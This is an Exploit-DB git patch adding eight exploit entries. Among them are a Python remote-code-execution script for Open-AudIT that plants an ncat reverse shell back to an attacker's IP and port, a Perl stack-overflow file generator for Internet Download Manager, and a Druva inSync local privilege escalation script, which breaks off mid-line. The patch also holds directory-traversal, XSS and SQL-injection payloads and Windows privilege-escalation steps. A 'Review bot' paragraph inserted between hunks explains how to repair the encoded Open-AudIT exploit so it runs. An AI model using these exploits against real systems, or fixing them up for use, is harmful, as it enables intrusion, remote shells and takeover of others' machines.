From a99d181f246f4e0a0df9fdd12050c27e210d6f96 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 30 Apr 2020 05:01:48 +0000
Subject: [PATCH] DB: 2020-04-30

8 changes to exploits/shellcodes

Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
EmEditor 19.8 - Insecure File Permissions
Druva inSync Windows Client 6.5.2 - Local Privilege Escalation
Open-AudIT Professional 3.3.1 - Remote Code Execution
School ERP Pro 1.0 - Arbitrary File Read
Easy Transfer 1.7 for iOS - Directory Traversal
hits script 1.0 - 'item_name' SQL Injection
---
exploits/ios/webapps/48395.txt | 187 ++++++++++++++++++++++++++++++
exploits/php/webapps/48393.py | 131 +++++++++++++++++++++
exploits/php/webapps/48394.txt | 42 +++++++
exploits/php/webapps/48399.txt | 100 ++++++++++++++++
exploits/windows/local/48396.txt | 34 ++++++
exploits/windows/local/48397.txt | 193 +++++++++++++++++++++++++++++++
exploits/windows/local/48398.txt | 67 +++++++++++
exploits/windows/local/48400.txt | 54 +++++++++
files_exploits.csv | 8 ++
9 files changed, 816 insertions(+)
create mode 100644 exploits/ios/webapps/48395.txt
create mode 100755 exploits/php/webapps/48393.py
create mode 100644 exploits/php/webapps/48394.txt
create mode 100644 exploits/php/webapps/48399.txt
create mode 100644 exploits/windows/local/48396.txt
create mode 100644 exploits/windows/local/48397.txt
create mode 100644 exploits/windows/local/48398.txt
create mode 100644 exploits/windows/local/48400.txt
diff --git a/exploits/ios/webapps/48395.txt b/exploits/ios/webapps/48395.txt
new file mode 100644
index 000000000..4bc8142e0
--- /dev/null
+++ b/exploits/ios/webapps/48395.txt
@@ -0,0 +1,187 @@
+# Title: Easy Transfer 1.7 for iOS - Directory Traversal
+# Author: Vulnerability Laboratory
+# Date: 2020-04-27
+# Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078
+# CVE: N/A
+
+Document Title:
+===============
+Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2223
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Affected Product(s):
+====================
+Rubikon Teknoloji
+Product: Easy Transfer v1.7 - iOS Mobile Web-Application
+(Copy of the Homepage:
+https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 )
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-27: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+1.1
+A directory traversal web vulnerability has been discovered in the Easy
+Transfer Wifi Transfer v1.7 ios mobile application.
+The vulnerability allows remote attackers to change the application path
+in performed requests to compromise the local application
+or file-system of a mobile device. Attackers are for example able to
+request environment variables or a sensitive system path.
+
+The directory-traversal web vulnerability is located in the main
+application path request performed via GET method. Attackers are
+able to request for example the local path variables of the web-server
+by changing the local path in the performed request itself.
+In a first request the attack changes the path, the host redirects to
+complete the adress with "..". Then the attacker just
+attaches /.. a final slash to its request and the path can be accessed
+via web-browser to download or list local files.
+
+Exploitation of the directory traversal web vulnerability requires no
+privileged web-application user account or user interaction.
+Successful exploitation of the vulnerability results in information
+leaking by unauthorized file access and mobile application compromise.
+
+
+1.2
+Multiple persistent cross site scripting vulnerability has been
+discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise the mobile
+web-application from the application-side.
+
+The persistent vulnerabilities are located in the `Create Folder` and
+`Move/Edit` functions. Attackers are able to inject own malicious
+script codes to the `oldPath`, `newPath` and `path` parameters. The
+request method to inject is POST and the attack vector is located on
+the application-side.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Create Folder
+[+] Move/Edit
+
+Vulnerable Parameter(s):
+[+] oldPath
+[+] newPath
+[+] path
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The directory traversal web vulnerability can be exploited by remote
+attackers with wifi network access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Exploitation
+http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
+..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
+
+[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]
+
+
+--- PoC Session Logs [GET] --- (list)
+http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
+..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
+Host: localhost
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+-
+GET: HTTP/1.1 200 OK
+Content-Length: 213
+Content-Type: application/json
+Connection: Close
+
+
+1.2
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with wifi network access with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Exploitation
+alert(document.domain)
+
+
+--- PoC Session Logs [POST] --- (Create & Move)
+http://localhost/create
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 47
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/
+path=/testalert(document.domain)
+-
+POST: HTTP/1.1 200 OK
+Cache-Control: no-cache
+Content-Length: 2
+Content-Type: application/json
+Connection: Close
+-
+http://localhost/move
+Host: localhost
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 69
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/
+oldPath=/test/alert(document.domain)&newPath=/testalert(document.domain)
+-
+POST: HTTP/1.1 200 OK
+Content-Length: 411
+Content-Type: text/html; charset=utf-8
+Connection: Close
+- [GET] (Execution)
+http://localhost/evil.source
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer: http://localhost/
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48393.py b/exploits/php/webapps/48393.py
new file mode 100755
index 000000000..de41b5a2b
--- /dev/null
+++ b/exploits/php/webapps/48393.py
@@ -0,0 +1,131 @@
+# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
+# Date: 2020-04-22
+# Exploit Author: Askar
+# CVE: CVE-2020-8813
+# Vendor Homepage: https://opmantek.com/
+# Version: v3.3.1
+# Tested on: Ubuntu 18.04 / PHP 7.2.24
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import warnings
+import random
+import string
+from bs4 import BeautifulSoup
+from urllib.parse import quote
+
+warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
+
+
+if len(sys.argv) !=3D 6:
+ print("[~] Usage : ./openaudit-exploit.py url username password ip port=
+")
+ exit()
+
+url =3D sys.argv[1]
+username =3D sys.argv[2]
+password =3D sys.argv[3]
+ip =3D sys.argv[4]
+port =3D sys.argv[5]
+
+request =3D requests.session()
+
+def inject_payload():
+ configuration_path =3D url+"/en/omk/open-audit/configuration/90"
+ data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"=
+:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
+port)
+ request.patch(configuration_path, data)
+ print("[+] Payload injected in settings")
+
+
+def start_discovery():
+ discovery_path =3D url+"/en/omk/open-audit/discoveries/create"
+ post_discovery_path =3D url+"/en/omk/open-audit/discoveries"
+ scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r=
+ange(10)])
+ req =3D request.get(discovery_path)
+
+ response =3D req.text
+ soup =3D BeautifulSoup(response, "html5lib")
+ token =3D soup.findAll('input')[5].get("value")
+ buttons =3D soup.findAll("button")
+ headers =3D {"Referer" : discovery_path}
+ request_data =3D {
+ "data[attributes][name]":scan_name,
+ "data[attributes][other][subnet]":"10.10.10.1/24",
+ "data[attributes][other][ad_server]":"",
+ "data[attributes][other][ad_domain]":"",
+ "submit":"",
+ "data[type]":"discoveries",
+ "data[access_token]":token,
+ "data[attributes][complete]":"y",
+ "data[attributes][org_id]":"1",
+ "data[attributes][type]":"subnet",
+ "data[attributes][devices_assigned_to_org]":"",
+ "data[attributes][devices_assigned_to_location]":"",
+ "data[attributes][other][nmap][discovery_scan_option_id]":"1",
+ "data[attributes][other][nmap][ping]":"y",
+ "data[attributes][other][nmap][service_version]":"n",
+ "data[attributes][other][nmap][open|filtered]":"n",
+ "data[attributes][other][nmap][filtered]":"n",
+ "data[attributes][other][nmap][timing]":"4",
+ "data[attributes][other][nmap][nmap_tcp_ports]":"0",
+ "data[attributes][other][nmap][nmap_udp_ports]":"0",
+ "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
+ "data[attributes][other][nmap][udp_ports]":"161",
+ "data[attributes][other][nmap][timeout]":"",
+ "data[attributes][other][nmap][exclude_tcp_ports]":"",
+ "data[attributes][other][nmap][exclude_udp_ports]":"",
+ "data[attributes][other][nmap][exclude_ip]":"",
+ "data[attributes][other][nmap][ssh_ports]":"22",
+ "data[attributes][other][match][match_dbus]":"",
+ "data[attributes][other][match][match_fqdn]":"",
+ "data[attributes][other][match][match_dns_fqdn]":"",
+ "data[attributes][other][match][match_dns_hostname]":"",
+ "data[attributes][other][match][match_hostname]":"",
+ "data[attributes][other][match][match_hostname_dbus]":"",
+ "data[attributes][other][match][match_hostname_serial]":"",
+ "data[attributes][other][match][match_hostname_uuid]":"",
+ "data[attributes][other][match][match_ip]":"",
+ "data[attributes][other][match][match_ip_no_data]":"",
+ "data[attributes][other][match][match_mac]":"",
+ "data[attributes][other][match][match_mac_vmware]":"",
+ "data[attributes][other][match][match_serial]":"",
+ "data[attributes][other][match][match_serial_type]":"",
+ "data[attributes][other][match][match_sysname]":"",
+ "data[attributes][other][match][match_sysname_serial]":"",
+ "data[attributes][other][match][match_uuid]":""
+
+ }
+ print("[+] Creating discovery ..")
+ req =3D request.post(post_discovery_path, data=3Drequest_data, headers=
+=3Dheaders, allow_redirects=3DFalse)
+ disocvery_url =3D url + req.headers['Location'] + "/execute"
+ print("[+] Triggering payload ..")
+ print("[+] Check your nc ;)")
+ request.get(disocvery_url)
+
+
+def login():
+ login_info =3D {
+ "redirect_url": "/en/omk/open-audit",
+ "username": username,
+ "password": password
+ }
+ login_request =3D request.post(url+"/en/omk/open-audit/login", login_in=
+fo)
+ login_text =3D login_request.text
+ if "There was an error authenticating" in login_text:
+ return False
+ else:
+ return True
+
+if login():
+ print("[+] LoggedIn Successfully")
+ inject_payload()
+ start_discovery()
+else:
+ print("[-] Cannot login!")
\ No newline at end of file
diff --git a/exploits/php/webapps/48394.txt b/exploits/php/webapps/48394.txt
new file mode 100644
index 000000000..27b503818
--- /dev/null
+++ b/exploits/php/webapps/48394.txt
@@ -0,0 +1,42 @@
+# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read
+# Date: 2020-04-28
+# Author: Besim ALTINOK
+# Vendor Homepage: http://arox.in
+# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
+# Version: latest version
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+# CVE: N/A
+
+Vulnerable code: (/student_staff/download.php)
+- File Name: download.php
+- Content of the download.php
+
+
+
+------------
+*Payload:*
+---------------
+
+http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php
+------------------------
+*After run payload: (we accessed of the file content)*
+------------------------
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48399.txt b/exploits/php/webapps/48399.txt
new file mode 100644
index 000000000..33b05660d
--- /dev/null
+++ b/exploits/php/webapps/48399.txt
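Review bot: The new 48393.py appears to have been committed still quoted-printable encoded rather than as plain Python: every `=` in the hunk reads `=3D` (e.g. `url =3D sys.argv[1]`) and over-long lines end in a soft-break `=` with the remainder on the following line (`... ip port=` / `")`, `for i in r=` / `ange(10)`, `login_in=` / `fo)`), so the interpreter will reject the file at the first statement until it is decoded (e.g. with `quopri.decodestring`) and re-committed. The `#!/usr/bin/python3` shebang sits on line 9 below the header comments, where the loader will not honour it even though the file is created with mode 100755; it belongs on line 1. The argument check and the `login()`, `inject_payload()` and `start_discovery()` calls all run at import time, so placing them under `if __name__ == "__main__":` would be the conventional layout. `from urllib.parse import quote` and the `buttons` local are never used.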
@@ -0,0 +1,100 @@
+# Exploit Title: hits script 1.0 - 'item_name' SQL Injection
+# Date: 2020-04-27
+# Exploit Author: SajjadBnd
+# Vendor Homepage: https://hits.ir
+# Software Link: http://dl.persianscript.ir/script/hitsir-script-persian%28PersianScript.ir%29.zip
+# Software Link(mirror): http://dl.nuller.ir/hitsir-script-persian[www.nuller.ir].zip
+# Version: 1.0
+# Tested on: Win10 Professional x64
+
+[ description of script ]
+
+With this script you can set up a site to exchange statistics and traffic as well as
+increase rankings. In this script, it is possible to exchange Google +1,
+exchange Facebook points, exchange Twitter followers,
+exchange YouTube visitors, exchange visit statistics.
+
+[ poc ]
+
+file : ipn.php
+
+parameters : 'item_name' , 'item_number'
+method : POST
+source [
+
+36: mysql_query $pack = mysql_fetch_object(mysql_query("SELECT * FROM `c_pack` WHERE `name`='{$item_name}' AND `coins`='{$item_number}'"));
+19: $item_name = $_POST['item_name'];
+20: $item_number = $_POST['item_number'];
+
+requires:
+4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
+31: if(!$fp) else
+35: if(strcmp($res, "VERIFIED") == 0)
+
+]
+
+parameter : 'custom'
+method : POST
+source [
+
+43: mysql_query mysql_query("UPDATE `users` SET `coins`=`coins`+'{$pack->coins}' WHERE `id`='{$custom}'");
+27: $custom = $_POST['custom'];
+
+requires:
+4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
+31: if(!$fp) else
+35: if(strcmp($res, "VERIFIED") == 0)
+41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
+
+]
+
+parameters : 'item_name','mc_gross'
+method : POST
+source [
+
+44: mysql_query mysql_query("INSERT INTO `transactions` (user, points, pack, money, date) VALUES('{$user->login}', '{$pack->coins}', '{$item_name}', '{$payment_amount}', NOW())");
+19: $item_name = $_POST['item_name'];
+22: $payment_amount = $_POST['mc_gross'];
+
+requires:
+4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
+31: if(!$fp) else
+35: if(strcmp($res, "VERIFIED") == 0)
+41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
+
+]
+
+
+file : register.php
+
+parameters : 'PlusREF','register'
+method : COOKIE,POST
+source [
+
+22: mysql_query $user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'");
+21: $ref = $_COOKIE['PlusREF'];
+
+requires:
+3: if(isset($_POST['register']))
+19: if(!checkpwd ($sec['password'], $sec['password2'])) else
+20: if(isset($_COOKIE['PlusREF']))
+
+]
+
+&
+
+source [
+
+40: mysql_query mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')") or
+37: $final = visitorip ();
+39: $passc = md5($passa);
+38: $passa = $sec['password'];
+38: $passa = $sec['password'];
+21: $ref = $_COOKIE['PlusREF']; // if(isset($_COOKIE)),
+26: $activare = rand(000000000, 999999909);
+
+requires:
+3: if(isset($_POST['register']))
+19: if(!checkpwd ($sec['password'], $sec['password2'])) else
+
+]
\ No newline at end of file
diff --git a/exploits/windows/local/48396.txt b/exploits/windows/local/48396.txt
new file mode 100644
index 000000000..1c0d82ccf
--- /dev/null
+++ b/exploits/windows/local/48396.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-04-28
+# Vendor Homepage: https://andreaelectronics.com/
+# Software Link : https://andreaelectronics.com/
+# Tested Version: 1.0.64.7
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """
+Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto
+
+C:\>sc qc AESTFilters
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: AESTFilters
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Andrea ST Filters Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48397.txt b/exploits/windows/local/48397.txt
new file mode 100644
index 000000000..c89d535b0
--- /dev/null
+++ b/exploits/windows/local/48397.txt
@@ -0,0 +1,193 @@
+# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
+# Author: Vulnerability Laboratory
+# Date: 2020-04-28
+# Vendor: https://www.internetdownloadmanager.com
+# Software: https://www.internetdownloadmanager.com/download.html
+# CVE: N/A
+
+Document Title:
+===============
+Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2236
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-28: Public Disclosure (Vulnerability Laboratory)
+(Copy of the Homepage:
+https://www.internetdownloadmanager.com/support/about_us.html )
+(Sofwtare Product: https://www.internetdownloadmanager.com/download.html)
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+Multiple stack buffer overflow vulnerabilities has been discovered in
+the official Internet Download Manager v6.37.11.1 software.
+The bufer overflow allows to overwrite registers of the process to
+compromise the file-system by elevates local process privileges.
+
+1.1
+The first stack buffer overflow is located in the `search` function of
+the downloads menu. The search function itself does not use
+any secure restriction in the requested search variable of the inputs.
+Local attackers with access to the software are able to overflow
+the registers to elevate local process privileges. Thus allows a local
+attacker to compromise the local computer- or file-system.
+
+1.2
+The second stack buffer overflow is located in the `Export/Import`
+function of the tasks menu. Local users are able to import and
+export the download tasks as *.ef2 file. Local attackers are able to
+import manipulated *.ef2 files with manipulated referer and
+source url to overwrite the eip register. The issue occurs because of
+the insufficient ef2 filetype (context) validation process
+that does not perform any length restrictions.
+
+The security risk of the local stack buffer overflow vulnerabilities in
+the software are estimated as high with a cvss count of 7.1.
+Exploitation of the buffer overflow vulnerability requires a low
+privilege or restricted system user account without user interaction.
+Successful exploitation of the vulnerability results in overwrite of the
+active registers to compromise of the computer system or process.
+
+Vulnerable Module(s):
+[+] Search
+[+] Import/Export (ef2)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The stack buffer overflow vulnerability can be exploited by local
+attackers with system user privileges without user interaction.
+For security demonstration or to reproduce the local vulnerability
+follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the software
+2. Click the downloads menu and open the search
+3. Inject a large unicode payload inside the search input field and transmit
+4. The software crashs with several uncaught exception because of
+overwritten register (0168D8F0)
+5. Successful reproduce of the local buffer overflow vulnerability!
+
+
+--- Debug Logs (0168D8F0) ---
+00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141
+-
+00D6186D |. 56 PUSH ESI ; /Arg1
+-
+00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ;
+IDMan.00D617E0
+-
+00D6189B |> 50 PUSH EAX ; /Arg1
+-
+00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ;
+IDMan.00D617E0
+-
+Call stack
+ Address=0168C79C
+ Stack=00DFE0F2
+ Procedure / arguments=IDMan.00D617E0
+ Called from=IDMan.00DFE0ED
+ Frame=0168E02C
+-
+SEH chain
+Address SE handler
+0168C790 IDMan.00F751E8
+0168D8F0 41414141
+-
+EAX 41414141
+ECX 01680000
+EDX 41414141
+EBX 00000001
+ESP 0168C76C
+EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
+ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
+EDI 00410043
+EIP 00D61850 IDMan.00D61850
+Executable modules
+ Base=00D60000
+ Size=00539000 (5476352.)
+ Entry=00F5CB1C IDMan.
+ Name=IDMan
+ File version=6, 37, 11, 2
+ Path=C:Program Files (x86)Internet Download ManagerIDMan.exe
+
+
+1.2
+The stack buffer overflow vulnerability can be exploited by local
+attackers with system user privileges without user interaction.
+For security demonstration or to reproduce the local vulnerability
+follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the software
+2. Start the bof_poc.pl
+3. Open the tasks menu
+4. Click import and import *.ef2 poc
+Note: The software process crashs on import with uncaught exception
+5. Successful reproduce of the local buffer overflow vulnerability!
+
+
+Usage Example: Export/Import (*.ef2)
+<
+https://www.vulnerability-lab.com/download_content.php?id=1337
+referer: https://www.vulnerability-lab.com/
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
+>
+
+
+PoC: Exploit
+#!/usr/bin/perl
+# Local Stack Buffer Overflow Exploit for Internet Download Manager
+v6.37.11.1
+# Vulnerability Laboratory - Benjamin Kunz Mejri
+my $poc = "bof_poc.ef2" ;
+print "[+] Producing bof_poc.ef2 ..." ;
+my $buff0=" "."<" x 1;
+my $buff1=" n https://"."A" x 1024;
+my $buff2=" n Referer:"."A" x 1024;
+my $buff3=" n User Agent:"."A" x 1024;
+my $buff4=" n ".">" x 1;
+open(ef2, ">>$poc") or die "Cannot open $poc";
+print ef2 $buff0;
+print ef2 $buff1;
+print ef2 $buff2;
+print ef2 $buff3;
+print ef2 $buff4;
+close(ef2);
+print "n[+] done !";
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/windows/local/48398.txt b/exploits/windows/local/48398.txt
new file mode 100644
index 000000000..a3b79fc0c
--- /dev/null
+++ b/exploits/windows/local/48398.txt
@@ -0,0 +1,67 @@
+# Exploit Title: EmEditor 19.8 - Insecure File Permissions
+# Date: 2020-04-27
+# Exploit Author: SajjadBnd
+# Vendor Homepage: https://www.emeditor.com/
+# Software Link: https://support.emeditor.com/en/downloads/suggested
+# Version: 19.8
+# Tested on: Win10 Professional x64
+
+[ Description ]
+
+EmEditor is a fast, lightweight, yet extensible, easy-to-use text editor for Windows.
+Both native 64-bit and 32-bit builds are available, and moreover,
+the 64-bit includes separate builds for SSE2 (128-bit), AVX-2 (256-bit),
+and AVX-512 (512-bit) instruction sets.
+
+[ PoC ]
+
+C:\Users\user\AppData\Local\Programs\EmEditor
+λ icacls *.exe
+
+ee128.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+ee256.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+ee512.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+EEAdmin.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+eehlpver.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+eeupdate.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+emedhtml.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+EmEditor.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+emedtray.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+emedws.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+Successfully processed 10 files; Failed processing 0 files
+
+[ Exploit - Privilege Escalation ]
+
+Replace any *.exe files with any executable
+malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
+- Also you can use DLL Hijacking technique(emonig.dll,emregexp.dll,emtoast.dll..) ;D
\ No newline at end of file
diff --git a/exploits/windows/local/48400.txt b/exploits/windows/local/48400.txt
new file mode 100644
index 000000000..68377f922
--- /dev/null
+++ b/exploits/windows/local/48400.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Druva inSync Windows Client 6.5.2 - Local Privilege Escalation
+# Date: 2020-04-28
+# Exploit Author: Chris Lyne
+# Vendor Homepage: druva.com
+# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
+# Version: 6.5.2
+# Tested on: Windows 10
+# CVE : CVE-2019-3999
+# See also: https://www.tenable.com/security/research/tra-2020-12
+
+import socket
+import struct
+import sys
+
+# Command injection in inSyncCPHwnet64 RPC service
+# Runs as nt authority\system. so we have a local privilege escalation
+
+if len(sys.argv) < 2:
+ print "Usage: " + __file__ + " "
+ print "E.g. " + __file__ + " \"net user /add tenable\""
+ sys.exit(0)
+
+ip = '127.0.0.1'
+port = 6064
+command_line = sys.argv[1]
+
+# command gets passed to CreateProcessW
+def make_wide(str):
+ new_str = ''
+ for c in str:
+ new_str += c
+ new_str += '\x00'
+ return new_str
+
+hello = "inSync PHC RPCW[v0002]"
+func_num = "\x05\x00\x00\x00" # 05 is to run a command
+command_line = make_wide(command_line)
+command_length = struct.pack('